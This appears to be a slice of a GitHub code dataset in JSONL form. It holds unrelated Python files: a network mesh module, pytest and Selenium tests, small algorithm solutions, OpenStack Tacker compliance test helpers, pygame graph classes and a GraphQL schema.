interval_sec)\n\n elif platform == \"win32\":\n # Enable TCP socket keepalive with (on/off, keep alive time, keep alive interval)\n log.debug(f\"MODIFYING TCP SOCKET PARAMETERS FOR WIN32.\")\n log.debug(\n f\"BEFORE: TCP_KEEPIDLE --> {sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE)}, TCP_KEEPINTVL --> {sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL)}, TCP_KEEPCNT --> {sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT)}\")\n sckt.ioctl(socket.SIO_KEEPALIVE_VALS, (1, ka_after_idle_sec * 1000, ka_interval_sec * 1000))\n log.debug(\n f\"AFTER: TCP_KEEPIDLE --> {sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE)}, TCP_KEEPINTVL --> {sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL)}, TCP_KEEPCNT --> {sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT)}\")\n\n\n\n\n\ndef update_config(data, _config):\n # Updating config (LISTENERS AND CONNECTORS)\n new_config = {'LISTENERS': data['PAYLOAD']['LISTENERS'], 'CONNECTORS': data['PAYLOAD']['CONNECTORS']}\n\n # Updating CLIENT and GLOBAL config (must be careful, there is already config in this clause)\n _config['CLIENT']['IPERF3_USERNAME'] = data['PAYLOAD']['CLIENT']['IPERF3_USERNAME']\n _config['CLIENT']['IPERF3_PASSWORD'] = data['PAYLOAD']['CLIENT']['IPERF3_PASSWORD']\n _config['CLIENT']['IPERF3_HASH'] = data['PAYLOAD']['CLIENT']['IPERF3_PASSWORD_HASH']\n _config['GLOBAL']['IPERF3_TIME_SKEW_THRESHOLD'] = data['PAYLOAD']['GLOBAL']['IPERF3_TIME_SKEW_THRESHOLD']\n _config.update(new_config)\n\n\ndef save_credentials(data, _config):\n with open(os.path.join(_config['GLOBAL']['IPERF3_RSA_KEY_DIRECTORY'], 'private_key_iperf_client.pem'), 'wb') as f:\n f.write(data['PAYLOAD']['CLIENT']['RSA_KEY_LISTENERS'].encode())\n\n with open(os.path.join(_config['GLOBAL']['IPERF3_RSA_KEY_DIRECTORY'], 'public_key_iperf_client.pem'), 'wb') as f:\n f.write(data['PAYLOAD']['CLIENT']['RSA_KEY_CONNECTORS'].encode())\n\n try:\n with open(os.path.join(_config['GLOBAL']['IPERF3_RSA_KEY_DIRECTORY'], 'credentials.csv'), 'w') as f:\n f.write(_config['CLIENT']['IPERF3_USERNAME'] + \",\" + _config['CLIENT']['IPERF3_HASH'])\n\n except Exception as exc:\n server_log.error(\n f\"server(): AN ERROR OCCURED WHILE WRITING IPERF3 CREDENTIALS\")\n\n\ndef is_valid_server_client(_config, uid, socket):\n for server_client in _config['SERVER_CLIENT']:\n if server_client['UID'] == uid:\n return True\n return False\n","repo_name":"lbsou/syntraf","sub_path":"lib/st_mesh.py","file_name":"st_mesh.py","file_ext":"py","file_size_in_byte":65872,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"29253834037","text":"import asyncio\nfrom unittest.mock import Mock\n\nimport pytest\n\nfrom maps_adv.common.helpers import dt\nfrom maps_adv.warden.client.lib import PeriodicalTask\nfrom maps_adv.warden.client.lib.exceptions import (\n Conflict,\n TaskTypeAlreadyAssigned,\n TooEarlyForNewTask,\n)\n\npytestmark = [pytest.mark.asyncio]\n\n\nasync def test_works_correctly_without_sensors(mocker, client_factory):\n mocker.patch.object(PeriodicalTask, \"_relaunch_interval_after_exception\", new=0)\n\n task = PeriodicalTask(\"no_sensors\", Mock([asyncio.sleep(0.1)]))\n\n try:\n await task(client_factory)\n except Exception:\n pytest.fail(\"Should not raise\")\n\n\nasync def test_initiates_metric_group_empty(periodical_task, metric_group):\n periodical_task(Mock())\n\n assert metric_group.serialize(\"azaza\") == []\n\n\n@pytest.mark.parametrize(\n \"side_effect, task_status\",\n [\n ([asyncio.sleep(0.1)], \"requested\"),\n ([asyncio.sleep(0.1)], \"accepted\"),\n ([asyncio.sleep(0.1)], \"completed\"),\n (asyncio.TimeoutError(), \"failed (timeout)\"),\n (Conflict(), \"failed (conflict)\"),\n (TaskTypeAlreadyAssigned(), \"failed (conflict)\"),\n (\n TooEarlyForNewTask(\n next_try_proto_dt=dt(\"2020-10-01 18:00:00\", as_proto=True)\n ),\n \"failed (conflict)\",\n ),\n (Exception, \"failed\"),\n ],\n)\nasync def test_composes_sensors_with_correct_data(\n side_effect, task_status, client_factory, periodical_task, metric_group\n):\n task = periodical_task(Mock(side_effect=side_effect))\n\n await task(client_factory)\n\n assert {\n \"labels\": {\n \"metric_group\": \"azaza\",\n \"task_name\": \"task_1\",\n \"task_status\": task_status,\n },\n \"type\": \"RATE\",\n \"value\": 1,\n } in metric_group.serialize(\"azaza\")\n\n\nasync def test_increments_counters_correctly_each_task_launch(\n client_factory, periodical_task, metric_group\n):\n task = periodical_task(Mock(side_effect=[asyncio.TimeoutError, asyncio.sleep(0.1)]))\n\n await task(client_factory)\n await task(client_factory)\n\n assert {\n s[\"labels\"][\"task_status\"]: s[\"value\"] for s in metric_group.serialize(\"azaza\")\n } == {\"requested\": 2, \"accepted\": 2, \"failed (timeout)\": 1, \"completed\": 1}\n\n\nasync def test_counts_every_task_separately(\n client_factory, periodical_task, metric_group\n):\n task1 = periodical_task(Mock(side_effect=[asyncio.sleep(0.1)]), name=\"task1\")\n task2 = periodical_task(Mock(side_effect=Conflict()), name=\"task2\")\n\n await task1(client_factory)\n await asyncio.sleep(0.1)\n await task2(client_factory)\n\n assert [\n dict(\n task_name=s[\"labels\"][\"task_name\"],\n task_status=s[\"labels\"][\"task_status\"],\n value=s[\"value\"],\n )\n for s in metric_group.serialize(\"azaza\")\n ] == [\n {\"task_name\": \"task1\", \"task_status\": \"requested\", \"value\": 1},\n {\"task_name\": \"task1\", \"task_status\": \"accepted\", \"value\": 1},\n {\"task_name\": \"task1\", \"task_status\": \"completed\", \"value\": 1},\n {\"task_name\": \"task2\", \"task_status\": \"requested\", \"value\": 1},\n {\"task_name\": \"task2\", \"task_status\": \"accepted\", \"value\": 1},\n {\"task_name\": \"task2\", \"task_status\": \"failed (conflict)\", \"value\": 1},\n ]\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/task_master/test_sensors.py","file_name":"test_sensors.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31098781381","text":"'''\r\nGiven a string containing only digits, restore it by returning all possible valid IP address combinations.\r\n\r\nExample:\r\n\r\nInput: \"25525511135\"\r\nOutput: [\"255.255.11.135\", \"255.255.111.35\"]\r\n'''\r\n\r\n#BackTrack method\r\nclass Solution:\r\n def restoreIpAddresses(self, s: str) -> List[str]:\r\n result = []\r\n \r\n def getSubAddress(curIP, s, lvl):\r\n if lvl == 0 and s == \"\":\r\n result.append(curIP[:-1])\r\n elif lvl != 0:\r\n for i in range(0, min(3, len(s))):\r\n if i > 0 and s[0] == \"0\":\r\n continue\r\n if 0 <= int(s[0:i+1]) <= 255:\r\n getSubAddress(curIP + s[0:i+1] + \".\", s[i+1:], lvl-1)\r\n \r\n lvl = 4\r\n getSubAddress(\"\", s, lvl)\r\n \r\n return result\r\n","repo_name":"XiaoLing941212/Summer-Leet-Code","sub_path":"7.8 - 93, 516/93. Restore IP Addresses.py","file_name":"93. Restore IP Addresses.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6355211724","text":"def makeGoodNumbers(input_string):\n def make_good_number(left_part, right_part):\n if 2 <= len(left_part) <= 4 and 2 <= len(right_part) <= 5:\n return f\"{left_part.zfill(4)}/{right_part.zfill(5)}\"\n else:\n return \"Некорректный формат номера\"\n\n good_numbers = []\n words = input_string.split()\n\n for word in words:\n if \"/\" in word:\n left_part, right_part = word.split(\"/\")\n good_number = make_good_number(left_part, right_part)\n if good_number:\n good_numbers.append(good_number)\n\n return good_numbers\n\n\nif __name__ == '__main__':\n\n input_string = \"Адрес 5467/456. Номер 405/549\"\n good_numbers = makeGoodNumbers(input_string)\n for number in good_numbers:\n print(number)","repo_name":"SweetB0nes/Sber_TT","sub_path":"Python/first_task.py","file_name":"first_task.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21182825371","text":"#!/usr/bin/env python\nimport pickle\nimport sys\nfrom pprint import pprint\n\npretty = True # Default\n\nif len(sys.argv) > 1:\n filename = sys.argv[1]\nelse:\n print(\"You need to supply an .pickle file - aborting\")\n sys.exit()\n\nif len(sys.argv) > 2:\n if sys.argv[2] == \"pretty\" or \"p\":\n pretty = True\n if sys.argv[2] == \"raw\" or \"r\":\n pretty = False\n\nwith open(filename, \"rb\") as f:\n data = pickle.load(f)\n\nif pretty:\n pprint(data, compact=True)\nelse:\n print(data)\n","repo_name":"Libensemble/libensemble","sub_path":"scripts/print_pickle.py","file_name":"print_pickle.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"3"} +{"seq_id":"29048729607","text":"# -*- coding: utf-8 -*-\n\nimport datetime\n\nimport pytest\n\nimport btestlib.reporter as reporter\nfrom balance import balance_api as api\nfrom balance import balance_steps as steps\n\nSERVICE_ID = 7\n# PRODUCT_ID = 502953 ##502918\nPRODUCT_ID = 1475\nPAYSYS_ID = 1020\nQTY = 10\nBASE_DT = datetime.datetime.now()\n\n\ndef test_deny_kzt_nonres_offerta_for_direct():\n client_id = None or steps.ClientSteps.create({'IS_AGENCY': 0, 'NAME': u'Petrov3'})\n # db.balance().execute(\"Update t_client set REGION_ID = :region_id where ID = :client_id\",\n # {'client_id': client_id, 'region_id': 159})\n agency_id = None\n\n order_owner = client_id\n invoice_owner = agency_id or client_id\n\n person_id = None or steps.PersonSteps.create(invoice_owner, 'kzu', {'phone': '234'})\n contract_id = None\n\n service_order_id = steps.OrderSteps.next_id(SERVICE_ID)\n steps.OrderSteps.create(order_owner, service_order_id, service_id=SERVICE_ID, product_id=PRODUCT_ID,\n params={'AgencyID': agency_id})\n orders_list = [{'ServiceID': SERVICE_ID, 'ServiceOrderID': service_order_id, 'Qty': QTY, 'BeginDT': BASE_DT}\n ]\n\n request_id = steps.RequestSteps.create(invoice_owner, orders_list)\n invoice_id, _, _ = steps.InvoiceSteps.create(request_id, person_id, PAYSYS_ID, credit=0, contract_id=contract_id,\n overdraft=0, endbuyer_id=None)\n steps.InvoiceSteps.pay(invoice_id)\n for item in api.test_balance().GetNotification(10, client_id): reporter.log(item)\n\n\nif __name__ == \"__main__\":\n pytest.main('-v')","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"billing/balance_tests/scripts/torvald/test_T22112_Multicurrency_notification_for_KZT.py","file_name":"test_T22112_Multicurrency_notification_for_KZT.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35458684876","text":"input_path = 'input.txt'\n\nscores = {')': 3, ']': 57, '}': 1197, '>': 25137}\nopening = ['(', '[', '{', '<']\nclosing = {'(': ')', '[': ']', '{': '}', '<': '>'}\n\n\ndef first_corrupted_char(line):\n stack = []\n for char in line:\n if char in opening:\n stack.append(char)\n else:\n if char == closing[stack[-1]]:\n stack.pop()\n else:\n return char\n \n\nif __name__ == '__main__':\n with open(input_path) as input_data:\n lines = input_data.read().split('\\n')\n\n score = 0\n for line in lines:\n illegal_char = first_corrupted_char(line)\n if illegal_char is not None:\n score += scores[illegal_char]\n\n print(score)\n","repo_name":"nmmarzano/advent-of-code-2021","sub_path":"Day 10/part_one.py","file_name":"part_one.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72360132883","text":"import json\nimport os\nimport time\nimport xml.etree.ElementTree as et\n\nfrom oslo_serialization import jsonutils\nfrom oslo_utils import uuidutils\nimport robot\nfrom urllib.parse import urlparse\n\nfrom tacker.tests.functional import base\nfrom tacker.tests.functional.sol.vnflcm import test_vnf_instance as vnflcmtest\n\nVNFPKG_PATH = '/vnfpkgm/v1/vnf_packages/%s'\nVNFINSS_PATH = '/vnflcm/v1/vnf_instances'\nVNFINS_PATH = '/vnflcm/v1/vnf_instances/%s'\nVNFINS_INST_PATH = '/vnflcm/v1/vnf_instances/%s/instantiate'\nVNFINS_TERM_PATH = '/vnflcm/v1/vnf_instances/%s/terminate'\nVNFINS_GET_LCM_OP_OCCS_PATH = '/vnflcm/v1/vnf_lcm_op_occs'\nVNFINS_GET_IND_LCM_OP_OCCS_PATH = '/vnflcm/v1/vnf_lcm_op_occs/%s'\nVNFINS_CREATE_SUBSC_PATH = '/vnflcm/v1/subscriptions'\nVNFINS_DEL_SUBSC_PATH = '/vnflcm/v1/subscriptions/%s'\nVNFINS_SCALE_PATH = '/vnflcm/v1/vnf_instances/%s/scale'\n\nINSTANTIATION_BODY = {\n 'flavourId': 'simple',\n 'extVirtualLinks': [\n {\n 'id': 'net0',\n 'resourceId': None,\n 'extCps': [\n {\n 'cpdId': 'CP1',\n 'cpConfig': [\n {\n 'cpProtocolData': [\n {\n 'layerProtocol': 'IP_OVER_ETHERNET'\n }\n ]\n }\n ]\n }\n ]\n }\n ],\n 'vimConnectionInfo': [\n {\n 'id': None,\n 'vimId': None,\n 'vimType': 'ETSINFV.OPENSTACK_KEYSTONE.v_2'\n }\n ]\n}\n\nTERMINATION_BODY = {\n 'terminationType': 'GRACEFUL',\n 'gracefulTerminationTimeout': 120\n}\n\nPATCH_BODY = {\n 'vnfInstanceName': 'vnf new name',\n 'vnfInstanceDescription': 'new description'\n}\n\nSUBSCRIPTION_BODY = {\n 'filter': {\n 'vnfInstanceSubscriptionFilter': {\n 'vnfdIds': [\n ''\n ]\n }\n },\n 'callbackUri': 'http://localhost:9091/endpoint'\n}\n\nSCALE_BODY = {\n 'type': 'SCALE_OUT',\n 'aspectId': 'VDU1',\n 'numberOfSteps': 1,\n 'additionalParams': {\n 'samplekey': 'samplevalue'\n }\n}\n\nHEAL_BODY = {\n 'vnfcInstanceId': None,\n 'cause': 'healing'\n}\n\nCHG_EXT_CONN_BODY = {\n \"extVirtualLinks\": [{\n \"id\": \"8877c521-7c51-4da8-a5b9-308b40437fd2\",\n \"resourceId\": \"dfc1872e-69a7-4f14-a2c7-5bac8bd545eb\",\n \"extCps\": [{\n \"cpdId\": \"CP1\",\n \"cpConfig\": [{\n }]\n }]\n }],\n \"vimConnectionInfo\": [{\n \"id\": \"748f7d54-9fdf-4e7a-a180-ec057a9eefd8\",\n \"vimId\": \"310e0d4c-7e85-42e4-b289-d09c0bdc44c8\",\n \"vimType\": \"openstack\",\n \"interfaceInfo\": {\n \"endpoint\": \"http://127.0.0.1/identity\"\n }\n }]\n}\n\n\nclass VnfPkgInfo:\n def __init__(self, vnfpkgid, vnfdid):\n self._vnfpkgid = vnfpkgid\n self._vnfdid = vnfdid\n\n @property\n def vnfpkgid(self):\n return self._vnfpkgid\n\n @property\n def vnfdid(self):\n return self._vnfdid\n\n\nclass BaseComplTest(base.BaseTackerTest):\n @classmethod\n def setUpClass(cls):\n super(BaseComplTest, cls).setUpClass()\n\n for vim_list in cls.client.list_vims().values():\n for vim in vim_list:\n if vim['name'] == 'VIM0':\n cls.vimid = vim['id']\n\n for net_list in cls.neutronclient().list_networks().values():\n for net in net_list:\n if net['name'] == 'net0':\n cls.net0_id = net['id']\n\n cls.base_dir = os.getcwd()\n cls.test_root_dir = os.path.join(cls.base_dir, 'api-tests')\n cls.sol_dir = os.path.join(cls.test_root_dir, cls.sol)\n cls.api_dir = os.path.join(cls.sol_dir, cls.api)\n cls.test_file = cls.resource + '.robot'\n os.chdir(cls.api_dir)\n\n parts = urlparse(cls.http_client.get_endpoint())\n\n cls.common_variables = []\n cls.common_variables.append('VNFM_SCHEMA:%s' % parts.scheme)\n cls.common_variables.append('NFVO_SCHEMA:%s' % parts.scheme)\n cls.common_variables.append('VNFM_HOST:%s' % parts.hostname)\n cls.common_variables.append('NFVO_HOST:%s' % parts.hostname)\n cls.common_variables.append('VNFM_PORT:%s' % parts.port)\n cls.common_variables.append('NFVO_PORT:%s' % parts.port)\n cls.common_variables.append('AUTH_USAGE:1')\n cls.common_variables.append('AUTHORIZATION_HEADER:X-Auth-Token')\n cls.common_variables.append('AUTHORIZATION_TOKEN:%s' %\n cls.http_client.get_token())\n\n @classmethod\n def tearDownClass(cls):\n os.chdir(cls.base_dir)\n\n super(BaseComplTest, cls).tearDownClass()\n\n @classmethod\n def _get_responses_from_output(cls, output):\n result = []\n for el in et.fromstring(output).findall(\n \".//kw[@name='Output']/[@library='REST']/msg[1]\"):\n result.append(json.loads(el.text))\n return result\n\n @classmethod\n def _get_id_from_output(cls, output):\n res = cls._get_responses_from_output(output)\n if ('status' in res[0] and\n res[0]['status'] in [200, 201, 202, 203, 204]):\n if ('body' in res[0] and 'id' in res[0]['body']):\n return res[0]['body']['id']\n\n return None\n\n @classmethod\n def _create_and_upload_vnf_packages(cls, pkgnames):\n vnfpkginfos = []\n for pkgname in pkgnames:\n vnfpkgid, vnfdid = vnflcmtest._create_and_upload_vnf_package(\n cls.http_client, pkgname, {})\n vnfpkginfos.append(VnfPkgInfo(vnfpkgid, vnfdid))\n\n return vnfpkginfos\n\n @classmethod\n def _disable_vnf_package(cls, vnfpkgid):\n cls.http_client.do_request(VNFPKG_PATH % vnfpkgid,\n 'PATCH', content_type='application/json',\n body=jsonutils.dumps({\"operationalState\": \"DISABLED\"}))\n\n @classmethod\n def _get_vnfpkgids(cls, vnfpkginfos):\n vnfpkgids = []\n for vnfpkginfo in vnfpkginfos:\n vnfpkgids.append(vnfpkginfo.vnfpkgid)\n\n return vnfpkgids\n\n @classmethod\n def _delete_vnf_package(cls, vnfpkgid):\n cls.http_client.do_request(VNFPKG_PATH % vnfpkgid, 'DELETE')\n\n @classmethod\n def _disable_and_delete_vnf_packages(cls, vnfpkginfos):\n for vnfpkginfo in vnfpkginfos:\n cls._disable_vnf_package(vnfpkginfo.vnfpkgid)\n cls._delete_vnf_package(vnfpkginfo.vnfpkgid)\n\n @classmethod\n def _create_vnf_instance(cls, vnfdid, name=None, description=None):\n body = {'vnfdId': vnfdid}\n if name:\n body['vnfInstanceName'] = name\n if description:\n body['vnfInstanceDescription'] = description\n\n res, resbody = cls.http_client.do_request(VNFINSS_PATH, 'POST',\n body=jsonutils.dumps(body))\n\n return res, resbody\n\n @classmethod\n def _delete_vnf_instance(cls, vnfid):\n resp, body = cls.http_client.do_request(VNFINS_PATH % vnfid, 'DELETE')\n\n @classmethod\n def _instantiate_vnf_instance(cls, vnfid):\n body = INSTANTIATION_BODY\n body['extVirtualLinks'][0]['resourceId'] = cls.net0_id\n body['vimConnectionInfo'][0]['id'] = uuidutils.generate_uuid()\n body['vimConnectionInfo'][0]['vimId'] = cls.vimid\n\n cls.http_client.do_request(VNFINS_INST_PATH % vnfid,\n 'POST', body=jsonutils.dumps(body))\n\n cls._wait_vnf_status(vnfid, 'instantiationState', 'INSTANTIATED')\n\n @classmethod\n def _terminate_vnf_instance(cls, vnfid):\n cls.http_client.do_request(VNFINS_TERM_PATH % vnfid,\n 'POST', body=jsonutils.dumps(TERMINATION_BODY))\n\n cls._wait_vnf_status(vnfid, 'instantiationState', 'NOT_INSTANTIATED')\n\n @classmethod\n def _get_vnf_ind_instance(cls, vnfid):\n res, resbody = cls.http_client.do_request(VNFINS_PATH % vnfid, 'GET')\n\n return resbody\n\n @classmethod\n def _get_vnf_instance_id(cls):\n res, resbody = cls.http_client.do_request(VNFINSS_PATH, 'GET')\n\n return resbody[0]['id']\n\n @classmethod\n def _instantiate_vnf_instance_for_scale(cls, vnfid):\n body = INSTANTIATION_BODY\n body['flavourId'] = 'default'\n body['extVirtualLinks'][0]['resourceId'] = cls.net0_id\n body['vimConnectionInfo'][0]['id'] = uuidutils.generate_uuid()\n body['vimConnectionInfo'][0]['vimId'] = cls.vimid\n body['additionalParams'] = {\n \"lcm-operation-user-data\": \"./UserData/lcm_user_data.py\",\n \"lcm-operation-user-data-class\": \"SampleUserData\"\n }\n\n cls.http_client.do_request(VNFINS_INST_PATH % vnfid,\n 'POST', body=jsonutils.dumps(body))\n\n cls._wait_vnf_status(vnfid, 'instantiationState', 'INSTANTIATED')\n\n @classmethod\n def _instantiate_error_vnf_instance(cls, vnfid):\n body = INSTANTIATION_BODY\n body['flavorId'] = 'sample'\n body['extVirtualLinks'][0]['resourceId'] = cls.net0_id\n body['vimConnectionInfo'][0]['id'] = uuidutils.generate_uuid()\n body['vimConnectionInfo'][0]['vimId'] = cls.vimid\n body['additionalParams'] = {\n \"lcm-operation-user-data\": \"./UserData/lcm_user_data2.py\",\n \"lcm-operation-user-data-class\": \"SampleUserData\"\n }\n\n cls.http_client.do_request(VNFINS_INST_PATH % vnfid,\n 'POST', body=jsonutils.dumps(body))\n\n cls._wait_vnf_status(vnfid, 'instantiationState', 'INSTANTIATED')\n\n @classmethod\n def _get_lcm_op_occs_id(cls, vnfid, lcm='INSTANTIATE'):\n res, resbody = cls.http_client.do_request(\n VNFINS_GET_LCM_OP_OCCS_PATH, 'GET')\n\n lcmid = None\n for entry in resbody:\n lcm_dict = entry\n if ((lcm_dict['vnfInstanceId'] == vnfid) and\n (lcm_dict['operation'] == lcm)):\n lcmid = lcm_dict['id']\n break\n\n return lcmid\n\n @classmethod\n def _create_subscription(cls, vnfdid):\n body = SUBSCRIPTION_BODY\n body['filter']['vnfInstanceSubscriptionFilter']['vnfdIds'] = [vnfdid]\n res, resbody = cls.http_client.do_request(VNFINS_CREATE_SUBSC_PATH,\n 'POST', body=jsonutils.dumps(body))\n\n subscid = cls._get_id_from_output(resbody)\n return subscid\n\n @classmethod\n def _get_subscription_id(cls):\n res, resbody = cls.http_client.do_request(VNFINS_CREATE_SUBSC_PATH,\n 'GET')\n\n subscid = resbody[0]['id']\n return subscid\n\n @classmethod\n def _delete_subscription(cls, subscId):\n cls.http_client.do_request(VNFINS_DEL_SUBSC_PATH % subscId,\n 'DELETE')\n\n @classmethod\n def _scaleout_vnf(cls, vnfid):\n body = SCALE_BODY\n body['type'] = 'SCALE_OUT'\n res_scale, resbody = cls.http_client.do_request(\n VNFINS_SCALE_PATH % vnfid,\n 'POST', body=jsonutils.dumps(body))\n\n print(\"scaleout called\")\n print(res_scale)\n print(resbody)\n lcmid = cls._get_lcm_op_occs_id(vnfid, lcm='SCALE')\n res = cls._wait_lcm_status(lcmid)\n return res, lcmid\n\n @classmethod\n def _wait_lcm_status(cls, lcmid, value='COMPLETED', expire=600):\n start_time = int(time.time())\n res = 1\n\n final_state = ''\n while True:\n resp, body = cls.http_client.do_request(\n VNFINS_GET_IND_LCM_OP_OCCS_PATH % lcmid, 'GET')\n\n if body is None:\n break\n\n if ((body['operationState'] == value) or\n (((int(time.time()) - start_time) > expire)) or\n (body['operationState'] == 'FAILED_TEMP')):\n final_state = body['operationState']\n break\n\n time.sleep(5)\n time.sleep(30)\n\n if final_state == value:\n res = 0\n\n return res\n\n @classmethod\n def _wait_vnf_status(cls, vnfid, attr, value, expire=600):\n start_time = int(time.time())\n while True:\n resp, body = cls.http_client.do_request(VNFINS_PATH % vnfid, 'GET')\n if body[attr] == value:\n break\n\n if ((int(time.time()) - start_time) > expire):\n break\n\n time.sleep(5)\n time.sleep(30)\n\n def _run(self, test_case, variables=[], body=None, filename=None):\n if (body is not None and filename is not None):\n with open(os.path.join('jsons', filename), 'w') as f:\n f.write(body)\n all_vars = []\n all_vars.extend(variables)\n all_vars.extend(self.common_variables)\n\n odir = os.path.join(self.base_dir, 'log',\n self.sol, self.api, self.resource,\n test_case.replace(' ', '_').replace('\"', ''))\n\n if not os.path.exists(odir):\n os.makedirs(odir)\n\n with open(os.path.join(odir, 'stdout.txt'), 'w') as stdout:\n rc = robot.run(self.test_file, variable=all_vars, test=test_case,\n outputdir=odir, stdout=stdout)\n\n with open(os.path.join(odir, 'output.xml'), 'r') as ofile:\n outputxml = ofile.read()\n\n return rc, outputxml\n","repo_name":"openstack/tacker","sub_path":"tacker/tests/compliance/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":13224,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"3"} +{"seq_id":"20819040536","text":"# Importar la libreria de webdriver\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options as ChromeOptions\nfrom selenium.webdriver.common.by import By\nimport unittest\nfrom POM.Pages.LoginPage import LoginPage\nfrom POM.Pages.HomePage import HomePage\n\nclass LoginTests(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.options = ChromeOptions()\n # cls.options.add_argument(\"--headless\")\n cls.driver = webdriver.Chrome(options=cls.options)\n\n def test_login_valid(self):\n driver = self.driver\n\n # Acceder al sitio\n driver.maximize_window()\n driver.get(\"https://opensource-demo.orangehrmlive.com\")\n time.sleep(6)\n # print(self.driver.title)\n\n login = LoginPage(driver)\n login.username_valid(\"Admin\")\n login.password_valid(\"admin123\")\n login.button_login()\n\n # self.driver.find_element(By.NAME, \"username\").send_keys(\"Admin\")\n # self.driver.find_element(By.NAME, \"password\").send_keys(\"admin123\")\n # self.driver.find_element(By.XPATH, \"//button[@type='submit']\").click()\n # self.driver.find_element(By.XPATH, \"//h6\")\n # time.sleep(5)\n\n homepage = HomePage(driver)\n homepage.HomeDashboard()\n homepage.HomeLogout()\n\n # self.driver.find_element(By.CLASS_NAME, \"oxd-userdropdown-tab\").click()\n # time.sleep(2)\n # self.driver.find_element(By.LINK_TEXT, \"Logout\").click()\n # time.sleep(2)\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.close()\n cls.driver.quit()\n print(\"Test Completed...\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"smavo/selenium_python_test","sub_path":"POM/Test/03_LoginTest_POM.py","file_name":"03_LoginTest_POM.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41107754812","text":"import pygame as pg\n\nimport csv\n\n\nclass InteractableObject:\n \"\"\"Class for mouse interactable elements on the screen.\"\"\"\n\n def __init__(self, surface, x, y, rect_radius, color=(0, 0, 0)):\n # Center a rect object about the given x, y\n self.surface, self.rect_radius = surface, rect_radius\n self.x, self.y = x, y\n self.xy = (self.x, self.y)\n x, y = x - rect_radius, y - rect_radius\n self.rect = pg.Rect((x, y), (2 * rect_radius, 2 * rect_radius))\n self.rect_radius = rect_radius\n self.color = color\n\n def __setattr__(self, attr, value):\n \"\"\"Helper function to set attributes for a dictionary of variable length.\"\"\"\n super().__setattr__(attr, value)\n\n def draw(self):\n \"\"\"Draw circle on given surface.\"\"\"\n pg.draw.circle(self.surface, self.color, self.xy, self.rect_radius)\n\n def update_xy(self, x, y):\n self.x, self.y = x, y\n self.xy = (self.x, self.y)\n self.rect.center = self.xy\n\n\nclass Point(InteractableObject):\n \"\"\"Class for point objects on a graph.\"\"\"\n\n def __init__(\n self,\n surface,\n point_dictionary,\n x_data_type,\n y_data_type,\n color_data_type=None,\n size_data_type=None,\n ):\n self.dict = point_dictionary\n self.set_parameters(x_data_type, y_data_type, color_data_type)\n super().__init__(surface, self.x, self.y, self.size)\n\n def __repr__(self):\n string_list = []\n for key in self.dict:\n string_list.append(f'{key}: {self.dict.get(key)}')\n return string_list\n\n def set_parameters(self,\n x_data_type,\n y_data_type,\n color_data_type=None,\n size_data_type=None,\n ):\n \"\"\"Set data types for x, y & color, size if applicable.\"\"\"\n self.x_data_type, self.y_data_type = x_data_type, y_data_type\n self.color_data_type, self.size_data_type = color_data_type, size_data_type\n self.x, self.y = float(self.dict[self.x_data_type]), float(self.dict[self.y_data_type])\n self.x0, self.y0 = self.x, self.y\n self.xy = (self.x, self.y)\n self.c = float(self.dict[self.color_data_type])\n # set default values\n self.color = (0, 0, 0)\n self.size = 5\n # set custom values if chosen\n if self.size_data_type:\n self.size = int(float(self.dict[self.size_data_type]))\n\n def update_color(self, color):\n if type(color) == tuple:\n self.color = color\n else:\n print('Color must be (r, g, b)')\n self.color = (0, 0, 0)\n","repo_name":"Saccharine-Coal/Pygame-Interactive-Graph","sub_path":"points.py","file_name":"points.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"34932023146","text":"from typing import Any\n\nfrom ariadne import ObjectType\nfrom data import (Author, Blog, BlogPayload, all_blogs, get_author, get_blog,\n update_blog)\nfrom graphql import GraphQLResolveInfo\n\nfrom schema.types import mutation, query\n\n#create connection here -> blogs with author\nBLOG_TYPEDEF = \"\"\"\n type Blog {\n id: ID!\n title: String!\n content: String!\n author: Author!\n }\n\n input BlogPayload {\n title: String\n content: String\n }\n\n type Mutation {\n update_blog(id: ID!, payload: BlogPayload!): Blog!\n }\n\"\"\"\n#attach resolver to blog object\nblog_query = ObjectType(\"Blog\")\n\n#define queries in MAIN_TYPEDEF\n@query.field(\"blogs\")\ndef resolve_blogs(_, info: GraphQLResolveInfo) -> list[Blog]:\n return all_blogs()\n\n\n@query.field(\"blog\")\ndef resolve_blog(_, info: GraphQLResolveInfo, id: str) -> Blog:\n return get_blog(int(id))\n\n\n@mutation.field(\"update_blog\")\ndef resolve_update_blog(\n _, info: GraphQLResolveInfo, id: str, payload: 